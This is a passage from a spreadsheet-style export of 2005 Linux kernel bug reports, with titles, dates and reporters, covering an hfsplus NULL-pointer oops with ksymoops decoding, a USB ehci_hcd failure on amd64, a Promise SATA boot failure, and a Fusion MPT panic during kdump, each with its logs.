    <t>Distribution: gentoo Hardware Environment: x86, dell optiplex gx270 Software Environment: gcc (GCC) 3.3.5, glibc 2.3.4 Problem Description: kernel panic while transferring files with gtkpod. dmesg output: Jul 8 13:55:43 monza scsi: Device offlined - not ready after error recovery: host 1 channel 0 id 0 lun 0 Jul 8 13:55:43 monza SCSI error : &lt;1 0 0 0&gt; return code = 0x50000 Jul 8 13:55:43 monza end_request: I/O error, dev sda, sector 21212447 Jul 8 13:55:43 monza Buffer I/O error on device sda3, logical block 2643356 Jul 8 13:55:43 monza scsi1 (0:0): rejecting I/O to offline device Jul 8 13:55:43 monza Buffer I/O error on device sda3, logical block 2643357 Jul 8 13:55:43 monza Buffer I/O error on device sda3, logical block 2643358 Jul 8 13:55:43 monza Buffer I/O error on device sda3, logical block 2643359 Jul 8 13:55:43 monza Buffer I/O error on device sda3, logical block 2643360 Jul 8 13:55:43 monza Buffer I/O error on device sda3, logical block 2643361 Jul 8 13:55:43 monza Buffer I/O error on device sda3, logical block 2643362 Jul 8 13:55:43 monza Buffer I/O error on device sda3, logical block 2643363 Jul 8 13:55:43 monza Buffer I/O error on device sda3, logical block 2643364 Jul 8 13:55:43 monza Buffer I/O error on device sda3, logical block 2643365 Jul 8 13:55:43 monza scsi1 (0:0): rejecting I/O to offline device Jul 8 13:55:43 monza scsi1 (0:0): rejecting I/O to offline device Jul 8 13:55:43 monza scsi1 (0:0): rejecting I/O to offline device Jul 8 13:55:43 monza scsi1 (0:0): rejecting I/O to offline device Jul 8 13:55:43 monza scsi1 (0:0): rejecting I/O to offline device Jul 8 13:55:43 monza scsi1 (0:0): rejecting I/O to offline device Jul 8 13:55:43 monza scsi1 (0:0): rejecting I/O to offline device Jul 8 13:55:43 monza scsi1 (0:0): rejecting I/O to offline device Jul 8 13:55:43 monza Unable to handle kernel NULL pointer dereference at virtual address 00000000 Jul 8 13:55:43 monza printing eip: Jul 8 13:55:43 monza c0146a73 Jul 8 13:55:43 monza *pde = 00000000 Jul 8 13:55:43 monza Oops: 0000 [#1] Jul 8 13:55:43 monza PREEMPT SMP Jul 8 13:55:43 monza Modules linked in: hfsplus Jul 8 13:55:43 monza CPU: 0 Jul 8 13:55:43 monza EIP: 0060:[&lt;c0146a73&gt;] Not tainted VLI Jul 8 13:55:43 monza EFLAGS: 00210203 (2.6.12.2) Jul 8 13:55:43 monza EIP is at mark_page_accessed+0x3/0x40 Jul 8 13:55:43 monza eax: 00000000 ebx: 00000000 ecx: 00000001 edx: 00000000 Jul 8 13:55:43 monza esi: c1f4e6c0 edi: c7132000 ebp: c7132058 esp: cdc1d850 Jul 8 13:55:43 monza ds: 007b es: 007b ss: 0068 Jul 8 13:55:43 monza Process gtkpod (pid: 13302, threadinfo=cdc1c000 task=d897aa40) Jul 8 13:55:43 monza Stack: 00000001 e01ef05b c1f4e6f0 c7132058 00200202 00000003 c1f4e6c0 00000176 Jul 8 13:55:43 monza c7132058 c7132000 e01eec75 c1f4e6c0 00000176 c844d206 00000026 e01edc46 Jul 8 13:55:43 monza c11660a0 c0fe5e40 c0fe5e78 00000026 0000005f 0000005e c0fe5e70 00000001 Jul 8 13:55:43 monza Call Trace: Jul 8 13:55:43 monza [&lt;e01ef05b&gt;] hfsplus_bnode_put+0xab/0xd0 [hfsplus] Jul 8 13:55:43 monza [&lt;e01eec75&gt;] hfsplus_bnode_find+0x105/0x2c0 [hfsplus] Jul 8 13:55:43 monza [&lt;e01edc46&gt;] hfsplus_bnode_read+0x76/0xe0 [hfsplus] Jul 8 13:55:43 monza [&lt;c022a091&gt;] _atomic_dec_and_lock+0x31/0x50 Jul 8 13:55:43 monza [&lt;e01ef05b&gt;] hfsplus_bnode_put+0xab/0xd0 [hfsplus] Jul 8 13:55:43 monza [&lt;e01f0240&gt;] hfsplus_brec_find+0x60/0x160 [hfsplus] Jul 8 13:55:43 monza [&lt;e01f0353&gt;] hfsplus_brec_read+0x13/0x50 [hfsplus] Jul 8 13:55:43 monza [&lt;e01ebbc3&gt;] hfsplus_find_cat+0x53/0xc0 [hfsplus] Jul 8 13:55:43 monza [&lt;e01edc46&gt;] hfsplus_bnode_read+0x76/0xe0 [hfsplus] Jul 8 13:55:43 monza [&lt;c01457c0&gt;] cache_alloc_refill+0x140/0x230 Jul 8 13:55:43 monza [&lt;e01edc46&gt;] hfsplus_bnode_read+0x76/0xe0 [hfsplus] Jul 8 13:55:43 monza [&lt;e01efff5&gt;] hfsplus_find_init+0x35/0x70 [hfsplus] Jul 8 13:55:43 monza [&lt;c017635b&gt;] alloc_inode+0x1b/0x140 Jul 8 13:55:43 monza [&lt;e01e80d4&gt;] hfsplus_read_inode+0xc4/0x190 [hfsplus] Jul 8 13:55:43 monza [&lt;e01ec5ec&gt;] hfsplus_lookup+0x1cc/0x230 [hfsplus] Jul 8 13:55:43 monza [&lt;c012fc6f&gt;] autoremove_wake_function+0x2f/0x60 Jul 8 13:55:43 monza [&lt;c0115d01&gt;] __wake_up_common+0x41/0x70 Jul 8 13:55:43 monza [&lt;c0115d6e&gt;] __wake_up+0x3e/0x60 Jul 8 13:55:43 monza [&lt;c01405bd&gt;] mempool_free+0x8d/0xa0 Jul 8 13:55:43 monza [&lt;c01405bd&gt;] mempool_free+0x8d/0xa0 Jul 8 13:55:43 monza [&lt;c03c99ec&gt;] schedule+0x3cc/0xcd0 Jul 8 13:55:43 monza [&lt;c03c9bed&gt;] schedule+0x5cd/0xcd0 Jul 8 13:55:43 monza [&lt;c012fc00&gt;] finish_wait+0x30/0x70 Jul 8 13:55:43 monza [&lt;c03cae5e&gt;] __wait_on_bit_lock+0x4e/0x70 Jul 8 13:55:43 monza [&lt;c013c2e0&gt;] sync_page+0x0/0x60 Jul 8 13:55:43 monza [&lt;c012fca0&gt;] wake_bit_function+0x0/0x60 Jul 8 13:55:43 monza [&lt;c017fd86&gt;] __mark_inode_dirty+0x66/0x1d0 Jul 8 13:55:43 monza [&lt;c011f76d&gt;] current_fs_time+0x5d/0x80 Jul 8 13:55:43 monza [&lt;c0113948&gt;] recalc_task_prio+0x88/0x150 Jul 8 13:55:43 monza [&lt;c0113aa0&gt;] activate_task+0x90/0xb0 Jul 8 13:55:43 monza [&lt;c017519d&gt;] d_alloc+0x13d/0x1a0 Jul 8 13:55:43 monza [&lt;c016a481&gt;] real_lookup+0xd1/0x100 Jul 8 13:55:43 monza [&lt;c016a7cd&gt;] do_lookup+0x9d/0xb0 Jul 8 13:55:43 monza [&lt;c016a8ee&gt;] __link_path_walk+0x10e/0xdb0 Jul 8 13:55:43 monza [&lt;c016b5d9&gt;] link_path_walk+0x49/0xe0 Jul 8 13:55:43 monza [&lt;c011640d&gt;] do_sched_setscheduler+0x7d/0xc0 Jul 8 13:55:43 monza [&lt;c016b938&gt;] path_lookup+0x98/0x1a0 Jul 8 13:55:43 monza [&lt;c016bc03&gt;] __user_walk+0x33/0x60 Jul 8 13:55:43 monza [&lt;c015a955&gt;] sys_access+0x85/0x150 Jul 8 13:55:43 monza [&lt;c011640d&gt;] do_sched_setscheduler+0x7d/0xc0 Jul 8 13:55:43 monza [&lt;c0102f35&gt;] syscall_call+0x7/0xb Jul 8 13:55:43 monza Code: 18 89 51 04 ba 01 00 00 00 ff 86 a0 05 00 00 89 8e 88 05 00 00 89 54 24 04 c7 04 24 38 00 00 00 e8 73 b5 ff ff eb 87 90 53 89 c3 &lt;8b&gt; 00 a8 40 75 17 8b 03 a8 04 74 11 8b 03 a8 20 75 18 8d 74 26 Jul 8 13:55:43 monza &lt;6&gt;note: gtkpod[13302] exited with preempt_count 1 Jul 8 13:55:43 monza scsi1 (0:0): rejecting I/O to offline device ksymoops output: monza ~ # ksymoops oops.txt ksymoops 2.4.11 on i686 2.6.12.2. Options used -V (default) -k /proc/ksyms (default) -l /proc/modules (default) -o /lib/modules/2.6.12.2/ (default) -m /usr/src/linux/System.map (default) Warning: You did not tell me where to find symbol information. I will assume that the log matches the kernel and modules that are running right now and I'll use the default options above for symbol resolution. If the current kernel and/or modules do not match the log, you can get more accurate output by telling me the kernel version and where to find map, modules, ksyms etc. ksymoops -h explains the options. Error (regular_file): read_ksyms stat /proc/ksyms failed ksymoops: No such file or directory No modules in ksyms, skipping objects No ksyms, skipping lsmod Unable to handle kernel NULL pointer dereference at virtual address 00000000 c0146a73 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c0146a73&gt;] Not tainted VLI Using defaults from ksymoops -t elf32-i386 -a i386 EFLAGS: 00210203 (2.6.12.2) eax: 00000000 ebx: 00000000 ecx: 00000001 edx: 00000000 esi: c1f4e6c0 edi: c7132000 ebp: c7132058 esp: cdc1d850 ds: 007b es: 007b ss: 0068 Stack: 00000001 e01ef05b c1f4e6f0 c7132058 00200202 00000003 c1f4e6c0 00000176 c7132058 c7132000 e01eec75 c1f4e6c0 00000176 c844d206 00000026 e01edc46 c11660a0 c0fe5e40 c0fe5e78 00000026 0000005f 0000005e c0fe5e70 00000001 Call Trace: [&lt;e01ef05b&gt;] hfsplus_bnode_put+0xab/0xd0 [hfsplus] [&lt;e01eec75&gt;] hfsplus_bnode_find+0x105/0x2c0 [hfsplus] [&lt;e01edc46&gt;] hfsplus_bnode_read+0x76/0xe0 [hfsplus] [&lt;c022a091&gt;] _atomic_dec_and_lock+0x31/0x50 [&lt;e01ef05b&gt;] hfsplus_bnode_put+0xab/0xd0 [hfsplus] [&lt;e01f0240&gt;] hfsplus_brec_find+0x60/0x160 [hfsplus] [&lt;e01f0353&gt;] hfsplus_brec_read+0x13/0x50 [hfsplus] [&lt;e01ebbc3&gt;] hfsplus_find_cat+0x53/0xc0 [hfsplus] [&lt;e01edc46&gt;] hfsplus_bnode_read+0x76/0xe0 [hfsplus] [&lt;c01457c0&gt;] cache_alloc_refill+0x140/0x230 [&lt;e01edc46&gt;] hfsplus_bnode_read+0x76/0xe0 [hfsplus] [&lt;e01efff5&gt;] hfsplus_find_init+0x35/0x70 [hfsplus] [&lt;c017635b&gt;] alloc_inode+0x1b/0x140 [&lt;e01e80d4&gt;] hfsplus_read_inode+0xc4/0x190 [hfsplus] [&lt;e01ec5ec&gt;] hfsplus_lookup+0x1cc/0x230 [hfsplus] [&lt;c012fc6f&gt;] autoremove_wake_function+0x2f/0x60 [&lt;c0115d01&gt;] __wake_up_common+0x41/0x70 [&lt;c0115d6e&gt;] __wake_up+0x3e/0x60 [&lt;c01405bd&gt;] mempool_free+0x8d/0xa0 [&lt;c01405bd&gt;] mempool_free+0x8d/0xa0 [&lt;c03c99ec&gt;] schedule+0x3cc/0xcd0 [&lt;c03c9bed&gt;] schedule+0x5cd/0xcd0 [&lt;c012fc00&gt;] finish_wait+0x30/0x70 [&lt;c03cae5e&gt;] __wait_on_bit_lock+0x4e/0x70 [&lt;c013c2e0&gt;] sync_page+0x0/0x60 [&lt;c012fca0&gt;] wake_bit_function+0x0/0x60 [&lt;c017fd86&gt;] __mark_inode_dirty+0x66/0x1d0 [&lt;c011f76d&gt;] current_fs_time+0x5d/0x80 [&lt;c0113948&gt;] recalc_task_prio+0x88/0x150 [&lt;c0113aa0&gt;] activate_task+0x90/0xb0 [&lt;c017519d&gt;] d_alloc+0x13d/0x1a0 [&lt;c016a481&gt;] real_lookup+0xd1/0x100 [&lt;c016a7cd&gt;] do_lookup+0x9d/0xb0 [&lt;c016a8ee&gt;] __link_path_walk+0x10e/0xdb0 [&lt;c016b5d9&gt;] link_path_walk+0x49/0xe0 [&lt;c011640d&gt;] do_sched_setscheduler+0x7d/0xc0 [&lt;c016b938&gt;] path_lookup+0x98/0x1a0 [&lt;c016bc03&gt;] __user_walk+0x33/0x60 [&lt;c015a955&gt;] sys_access+0x85/0x150 [&lt;c011640d&gt;] do_sched_setscheduler+0x7d/0xc0 [&lt;c0102f35&gt;] syscall_call+0x7/0xb Code: 18 89 51 04 ba 01 00 00 00 ff 86 a0 05 00 00 89 8e 88 05 00 00 89 54 24 04 c7 04 24 38 00 00 00 e8 73 b5 ff ff eb 87 90 53 89 c3 &lt;8b&gt; 00 a8 40 75 17 8b 03 a8 04 74 11 8b 03 a8 20 75 18 8d 74 26 &gt;&gt;EIP; c0146a73 &lt;lru_add_drain+3/80&gt; &lt;===== &gt;&gt;esi; c1f4e6c0 &lt;pg0+19f26c0/3faa2400&gt; &gt;&gt;edi; c7132000 &lt;pg0+6bd6000/3faa2400&gt; &gt;&gt;ebp; c7132058 &lt;pg0+6bd6058/3faa2400&gt; &gt;&gt;esp; cdc1d850 &lt;pg0+d6c1850/3faa2400&gt; Trace; e01ef05b &lt;pg0+1fc9305b/3faa2400&gt; Trace; e01eec75 &lt;pg0+1fc92c75/3faa2400&gt; Trace; e01edc46 &lt;pg0+1fc91c46/3faa2400&gt; Trace; c022a091 &lt;__get_user_4+1/17&gt; Trace; e01ef05b &lt;pg0+1fc9305b/3faa2400&gt; Trace; e01f0240 &lt;pg0+1fc94240/3faa2400&gt; Trace; e01f0353 &lt;pg0+1fc94353/3faa2400&gt; Trace; e01ebbc3 &lt;pg0+1fc8fbc3/3faa2400&gt; Trace; e01edc46 &lt;pg0+1fc91c46/3faa2400&gt; Trace; c01457c0 &lt;free_block+10/e0&gt; Trace; e01edc46 &lt;pg0+1fc91c46/3faa2400&gt; Trace; e01efff5 &lt;pg0+1fc93ff5/3faa2400&gt; Trace; c017635b &lt;alloc_inode+11b/140&gt; Trace; e01e80d4 &lt;pg0+1fc8c0d4/3faa2400&gt; Trace; e01ec5ec &lt;pg0+1fc905ec/3faa2400&gt; Trace; c012fc6f &lt;wake_bit_function+4f/60&gt; Trace; c0115d01 &lt;__wake_up+41/60&gt; Trace; c0115d6e &lt;__wake_up_sync+1e/80&gt; Trace; c01405bd &lt;badness+4d/120&gt; Trace; c01405bd &lt;badness+4d/120&gt; Trace; c03c99ec &lt;__rpc_wake_up_next_priority+bc/f0&gt; Trace; c03c9bed &lt;__rpc_execute+d/360&gt; Trace; c012fc00 &lt;autoremove_wake_function+40/60&gt; Trace; c03cae5e &lt;rpcauth_lookup_credcache+4e/1d0&gt; Trace; c013c2e0 &lt;__filemap_fdatawrite_range+40/d0&gt; Trace; c012fca0 &lt;__wake_up_bit+20/40&gt; Trace; c017fd86 &lt;__mark_inode_dirty+166/1d0&gt; Trace; c011f76d &lt;timespec_trunc+5d/60&gt; Trace; c0113948 &lt;recalc_task_prio+c8/150&gt; Trace; c0113aa0 &lt;deactivate_task+20/30&gt; Trace; c017519d &lt;d_instantiate+2d/70&gt; Trace; c016a481 &lt;__follow_mount+21/b0&gt; Trace; c016a7cd &lt;__link_path_walk+ed/db0&gt; Trace; c016a8ee &lt;__link_path_walk+20e/db0&gt; Trace; c016b5d9 &lt;__emul_lookup_dentry+49/170&gt; Trace; c011640d &lt;sys_sched_setparam+1d/30&gt; Trace; c016b938 &lt;path_lookup+198/1a0&gt; Trace; c016bc03 &lt;unlock_rename+23/40&gt; Trace; c015a955 &lt;sys_chdir+35/90&gt; Trace; c011640d &lt;sys_sched_setparam+1d/30&gt; Trace; c0102f35 &lt;syscall_call+7/b&gt; This architecture has variable length instructions, decoding before eip is unreliable, take these instructions with a pinch of salt. Code; c0146a48 &lt;lru_cache_add_active+38/60&gt; 00000000 &lt;_EIP&gt;: Code; c0146a48 &lt;lru_cache_add_active+38/60&gt; 0: 18 89 51 04 ba 01 sbb %cl,0x1ba0451(%ecx) Code; c0146a4e &lt;lru_cache_add_active+3e/60&gt; 6: 00 00 add %al,(%eax) Code; c0146a50 &lt;lru_cache_add_active+40/60&gt; 8: 00 ff add %bh,%bh Code; c0146a52 &lt;lru_cache_add_active+42/60&gt; a: 86 a0 05 00 00 89 xchg %ah,0x89000005(%eax) Code; c0146a58 &lt;lru_cache_add_active+48/60&gt; 10: 8e 88 05 00 00 89 movl 0x89000005(%eax),%cs Code; c0146a5e &lt;lru_cache_add_active+4e/60&gt; 16: 54 push %esp Code; c0146a5f &lt;lru_cache_add_active+4f/60&gt; 17: 24 04 and $0x4,%al Code; c0146a61 &lt;lru_cache_add_active+51/60&gt; 19: c7 04 24 38 00 00 00 movl $0x38,(%esp) Code; c0146a68 &lt;lru_cache_add_active+58/60&gt; 20: e8 73 b5 ff ff call ffffb598 &lt;_EIP+0xffffb598&gt; Code; c0146a6d &lt;lru_cache_add_active+5d/60&gt; 25: eb 87 jmp ffffffae &lt;_EIP+0xffffffae&gt; Code; c0146a6f &lt;lru_cache_add_active+5f/60&gt; 27: 90 nop Code; c0146a70 &lt;lru_add_drain+0/80&gt; 28: 53 push %ebx Code; c0146a71 &lt;lru_add_drain+1/80&gt; 29: 89 c3 mov %eax,%ebx This decode from eip onwards should be reliable Code; c0146a73 &lt;lru_add_drain+3/80&gt; 00000000 &lt;_EIP&gt;: Code; c0146a73 &lt;lru_add_drain+3/80&gt; &lt;===== 0: 8b 00 mov (%eax),%eax &lt;===== Code; c0146a75 &lt;lru_add_drain+5/80&gt; 2: a8 40 test $0x40,%al Code; c0146a77 &lt;lru_add_drain+7/80&gt; 4: 75 17 jne 1d &lt;_EIP+0x1d&gt; Code; c0146a79 &lt;lru_add_drain+9/80&gt; 6: 8b 03 mov (%ebx),%eax Code; c0146a7b &lt;lru_add_drain+b/80&gt; 8: a8 04 test $0x4,%al Code; c0146a7d &lt;lru_add_drain+d/80&gt; a: 74 11 je 1d &lt;_EIP+0x1d&gt; Code; c0146a7f &lt;lru_add_drain+f/80&gt; c: 8b 03 mov (%ebx),%eax Code; c0146a81 &lt;lru_add_drain+11/80&gt; e: a8 20 test $0x20,%al Code; c0146a83 &lt;lru_add_drain+13/80&gt; 10: 75 18 jne 2a &lt;_EIP+0x2a&gt; Code; c0146a85 &lt;lru_add_drain+15/80&gt; 12: 8d .byte 0x8d Code; c0146a86 &lt;lru_add_drain+16/80&gt; 13: 74 26 je 3b &lt;_EIP+0x3b&gt; 1 warning and 1 error issued. Results may not be reliable.</t>
  </si>
  <si>
    <t>motherboard ga-k8nf-9: ehci_hcd doesn't work</t>
  </si>
  <si>
    <t>2005-07-08 12:09 UTC</t>
  </si>
  <si>
    <t>Marco Clocchiatti</t>
  </si>
  <si>
    <t>2005-08-17 05:57 UTC</t>
  </si>
  <si>
    <t>Distribution:gentoo Hardware Environment: amd64 motherboard ga-k8nf-9 Software Environment: sys-kernel/gentoo-sources-2.6.12-r4 and sys-kernel/vanilla-sources-2.6.13_rc1 s939 ~ # emerge info Portage 2.0.51.22-r1 (default-linux/amd64/2005.0, gcc-3.4.3, glibc-2.3.5-r0, 2.6.12-gentoo-r3 x86_64) ================================================================= System uname: 2.6.12-gentoo-r3 x86_64 AMD Athlon(tm) 64 Processor 3500+ Gentoo Base System version 1.6.12 ccache version 2.3 [enabled] dev-lang/python: 2.3.5 sys-apps/sandbox: 1.2.9 sys-devel/autoconf: 2.13, 2.59-r6 sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.5 sys-devel/binutils: 2.15.92.0.2-r10 sys-devel/libtool: 1.5.18-r1 virtual/os-headers: 2.6.11-r2 ACCEPT_KEYWORDS="amd64" AUTOCLEAN="yes" CBUILD="x86_64-pc-linux-gnu" CFLAGS="-march=athlon64 -O2 -pipe -fweb -frename-registers -ftracer" CHOST="x86_64-pc-linux-gnu" CONFIG_PROTECT="/etc /usr/kde/2/share/config /usr/kde/3.4/env /usr/kde/3.4/share/config /usr/kde/3.4/shutdown /usr/kde/3/share/config /usr/lib/X11/xkb /usr/lib/mozilla/defaults/pref /usr/share/config /var/qmail/control" CONFIG_PROTECT_MASK="/etc/gconf /etc/splash /etc/terminfo /etc/env.d" CXXFLAGS="-march=athlon64 -O2 -pipe -fweb -frename-registers -ftracer" DISTDIR="/usr/portage/distfiles" FEATURES="autoconfig buildpkg ccache distlocks sandbox sfperms strict" GENTOO_MIRRORS="http://cdn.mirror.garr.it/mirrors/gentoo/ http://www.die.unipd.it/pub/Linux/distributions/gentoo-sources/ http://pandemonium.tiscali.de/pub/gentoo/ ftp://pandemonium.tiscali.de/pub/gentoo/ ftp://mirror.nutsmaas.nl/gentoo/ ftp://ftp.tu-clausthal.de/pub/linux/gentoo/" LANG="it_IT@euro" LC_ALL="it_IT" LDFLAGS="-Wl,-O1 -Wl,--as-needed" LINGUAS="it" MAKEOPTS="-j3 -s" PKGDIR="/usr/portage/packages" PORTAGE_TMPDIR="/var/tmp" PORTDIR="/usr/portage" PORTDIR_OVERLAY="/usr/local/portage" SYNC="rsync://rsync.gentoo.org/gentoo-portage" USE="amd64 X aalib acpi alsa bash-completion berkdb bitmap-fonts bzip2 bzlib cddb cdr chroot crypt cspell cups curl dvd dvdr eds encode esd fam flac font-server foomaticdb fortran fpx gif gimpprint gnome gphoto2 gpm graphviz gstreamer gtk gtk2 gtkhtml hal ieee1394 imagemagick imlib jack java javascript jbig jp2 jpeg kde kdeenablefinal lcms ldap libwww lzw lzw-tiff mad mime mng mozilla mp3 mpeg nas ncurses nls nptl nvidia ogg opengl oss pam pam_chroot pam_console pam_timestamp perl php png posix ppds pwdb python qt readline rtc samba scanner slang smp ssl svg tcltk tcpd tiff truetype truetype-fonts type1-fonts unicode usb userlocales wmf xine xml xml2 xmms xpm xrandr xv zlib linguas_it userland_GNU kernel_linux elibc_glibc" Unset: ASFLAGS, CTARGET Problem Description: kernel doesn't load correctly usb 2.0 devices using ehci_hcd module. They work only with ohci_hcd module on 64 bit installation or with ehci_hcd module on 32 bit installation. I've just documented my bug to this address: http://bugs.gentoo.org/show_bug.cgi?id=98100 with a lot of debug. Steps to reproduce: 1. boot linux. 2. attach a usb 2.0 device 3. watch the log of /var/log/kernel/current. Sorry, but is my first bug report and I don't try a way to attach external files. So I put something here. Other logs are on gentoo bugzilla. They work only with ohci_hcd module on 64 bit installation or with ehci_hcd module on 32 bit installation</t>
  </si>
  <si>
    <t>Driver for Promise Technology, Inc. PDC20376 (FastTrak 376) does not work!</t>
  </si>
  <si>
    <t>2.6.13 rc2</t>
  </si>
  <si>
    <t>2005-07-10 09:43 UTC</t>
  </si>
  <si>
    <t>Keyhan Hadjari</t>
  </si>
  <si>
    <t>2005-07-29 00:32 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: AMD2500+ 512 GB RAM 120 GB SEAGATE BARACUDA SATA Drive Software Environment: Gentoo 2005.0 Problem Description: After getting the 2.6.13rc2 kernel I build it using the same config file as I used for 2.6.12r2 and which worked fine there. But with the newer kernel I get this error message at boot time: The root block device is unspecified or not detected Steps to reproduce: Have your /boot on a SATA drive on a motherboard that uses Promise Technology, Inc. PDC20376 (FastTrak 376) (rev 02), build the kernel with the right drivers for the promise chipset (TX2), fix grub and reboot, you should notice the problem.</t>
  </si>
  <si>
    <t>Fusion mpt base driver initialization failure during booting of 2nd kernel of kdump</t>
  </si>
  <si>
    <t>2005-07-10 22:46 UTC</t>
  </si>
  <si>
    <t>Bharata B Rao</t>
  </si>
  <si>
    <t>2008-03-05 00:16 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 9 Hardware Environment: 4 CPU Intel Xeon machine lspci output: 00:00.0 Host bridge: ServerWorks CMIC-LE (rev 13) 00:00.1 Host bridge: ServerWorks CMIC-LE 00:00.2 Host bridge: ServerWorks: Unknown device 0000 00:01.0 Bridge: IBM Remote Supervisor Adapter (RSA) 00:09.0 VGA compatible controller: ATI Technologies Inc Rage XL (rev 27) 00:0f.0 Host bridge: ServerWorks CSB5 South Bridge (rev 93) 00:0f.1 IDE interface: ServerWorks CSB5 IDE Controller (rev 93) 00:0f.2 USB Controller: ServerWorks OSB4/CSB5 OHCI USB Controller (rev 05) 00:0f.3 ISA bridge: ServerWorks GCLE Host Bridge 00:10.0 Host bridge: ServerWorks: Unknown device 0101 (rev 05) 00:10.2 Host bridge: ServerWorks: Unknown device 0101 (rev 05) 00:11.0 Host bridge: ServerWorks: Unknown device 0101 (rev 05) 00:11.2 Host bridge: ServerWorks: Unknown device 0101 (rev 05) 02:01.0 Ethernet controller: Intel Corp. 82557/8/9 [Ethernet Pro 100] (rev 0c) 02:02.0 Ethernet controller: Intel Corp.: Unknown device 1079 (rev 03) 02:02.1 Ethernet controller: Intel Corp.: Unknown device 1079 (rev 03) 02:08.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5703 Gigabit Ethernet (rev 02) 05:03.0 Ethernet controller: Intel Corp.: Unknown device 1079 (rev 03) 05:03.1 Ethernet controller: Intel Corp.: Unknown device 1079 (rev 03) 05:07.0 SCSI storage controller: LSI Logic / Symbios Logic 53c1030 (rev 07) 05:07.1 SCSI storage controller: LSI Logic / Symbios Logic 53c1030 (rev 07) 07:05.0 SCSI storage controller: Adaptec AIC-7892A U160/m (rev 02) 09:06.0 Ethernet controller: Intel Corp. 82557/8/9 [Ethernet Pro 100] (rev 08) Software Environment: Running 2.6.13-rc1 as the capture kernel. Problem Description: When the 2nd(capture) kernel boots (to capture the dump after the base kernel crashed), the Fusion MPT driver initialization cause a system panic. Steps to reproduce: - Configure the system for kdump - Allow the base kernel to crash - To capture the dump, the 2nd kernel boots and panics during the inialization phase of MPT driver. --------log---------- Linux version 2.6.13-rc1 (root@llm05.in.ibm.com) (gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2- 5)) #1 Fri Jul 8 19:19:49 IST 2005 BIOS-provided physical RAM map: BIOS-e820: 0000000000000100 - 000000000009d400 (usable) BIOS-e820: 000000000009d400 - 00000000000a0000 (reserved) BIOS-e820: 0000000000100000 - 00000000effe7f40 (usable) BIOS-e820: 00000000effe7f40 - 00000000effef800 (ACPI data) BIOS-e820: 00000000effef800 - 00000000f0000000 (reserved) BIOS-e820: 00000000fec00000 - 0000000100000000 (reserved) user-defined physical RAM map: user: 0000000000000000 - 00000000000a0000 (usable) user: 0000000001000000 - 000000000148d000 (usable) user: 000000000152d400 - 0000000005000000 (usable) 0MB HIGHMEM available. 80MB LOWMEM available. found SMP MP-table at 0009d540 DMI 2.3 present. ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) Processor #0 15:2 APIC version 20 ACPI: LAPIC (acpi_id[0x01] lapic_id[0x06] enabled) Processor #6 15:2 APIC version 20 WARNING: NR_CPUS limit of 1 reached. Processor ignored. ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled) Processor #1 15:2 APIC version 20 WARNING: NR_CPUS limit of 1 reached. Processor ignored. ACPI: LAPIC (acpi_id[0x03] lapic_id[0x07] enabled) Processor #7 15:2 APIC version 20 WARNING: NR_CPUS limit of 1 reached. Processor ignored. ACPI: LAPIC_NMI (acpi_id[0x00] dfl dfl lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x06] dfl dfl lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x01] dfl dfl lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x07] dfl dfl lint[0x1]) ACPI: IOAPIC (id[0x0e] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 14, version 17, address 0xfec00000, GSI 0-15 ACPI: IOAPIC (id[0x0d] address[0xfec01000] gsi_base[16]) IOAPIC[1]: apic_id 13, version 17, address 0xfec01000, GSI 16-31 ACPI: IOAPIC (id[0x0c] address[0xfec02000] gsi_base[32]) IOAPIC[2]: apic_id 12, version 17, address 0xfec02000, GSI 32-47 ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) Enabling APIC mode: Flat. Using 3 I/O APICs Using ACPI (MADT) for SMP configuration information Allocating PCI resources starting at 05000000 (gap: 05000000:fb000000) Built 1 zonelists Kernel command line: root=/dev/sda5 console=tty0 console=ttyS0,38400 init 1 irqpoll memmap=exactmap memmap=640K@0K memmap=4660K@16384K memmap=60235K@21685K elfcorehdr=21684K Misrouted IRQ fixup and polling support enabled This may significantly impact system performance Initializing CPU#0 PID hash table entries: 512 (order: 9, 8192 bytes) Detected 2395.326 MHz processor. Using tsc for high-res timesource Console: colour VGA+ 80x25 Dentry cache hash table entries: 16384 (order: 4, 65536 bytes) Inode-cache hash table entries: 8192 (order: 3, 32768 bytes) Inode-cache hash table entries: 8192 (order: 3, 32768 bytes) Memory: 59980k/81920k available (2923k kernel code, 5368k reserved, 1203k data, 204k init, 0k highm em) Checking if this processor honours the WP bit even in supervisor mode... Ok. Calibrating delay using timer specific routine.. 4803.25 BogoMIPS (lpj=9606513) Mount-cache hash table entries: 512 CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU0: Intel P4/Xeon Extended MCE MSRs (12) available CPU0: Thermal monitoring enabled CPU: Intel(R) Xeon(TM) CPU 2.40GHz stepping 07 Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. ENABLING IO-APIC IRQs ..TIMER: vector=0x31 pin1=2 pin2=-1 NET: Registered protocol family 16 PCI: PCI BIOS revision 2.10 entry at 0xfd7cc, last bus=10 PCI: Using configuration type 1 mtrr: v2.0 (20020519) ACPI: Subsystem revision 20050309 ACPI: Interpreter enabled ACPI: Using IOAPIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) PCI: Probing PCI hardware (bus 00) PCI: Ignoring BAR0-3 of IDE controller 0000:00:0f.1 ACPI: PCI Root Bridge [PCI1] (0000:02) PCI: Probing PCI hardware (bus 02) ACPI: PCI Root Bridge [PCI2] (0000:05) PCI: Probing PCI hardware (bus 05) ACPI: PCI Root Bridge [PCI3] (0000:07) PCI: Probing PCI hardware (bus 07) ACPI: PCI Root Bridge [PCI4] (0000:09) PCI: Probing PCI hardware (bus 09) ACPI: PCI Interrupt Link [LP00] (IRQs *3) ACPI: PCI Interrupt Link [LP01] (IRQs) *0, disabled. 